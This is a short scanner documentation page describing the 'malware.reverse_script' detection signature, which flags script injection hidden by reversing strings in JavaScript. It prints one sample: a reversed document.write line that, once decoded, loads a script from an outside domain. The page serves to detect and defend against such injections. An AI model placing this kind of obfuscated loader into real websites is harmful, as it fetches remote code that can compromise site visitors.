SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures
  4. malware.reverse_script


Suspicious code that uses the .split("").reverse(​).join("") trick to obfuscate injection of scripts into a web page.

There are many ways to use this trick in malware. The most simple may look like this

document.​write('>tpircs/<>"/rcs/gu.oc​.nocife//:​ptth"=crs tpircs<'.split("").reverse(​).join(""))

Affecting: Any web site (no specific target).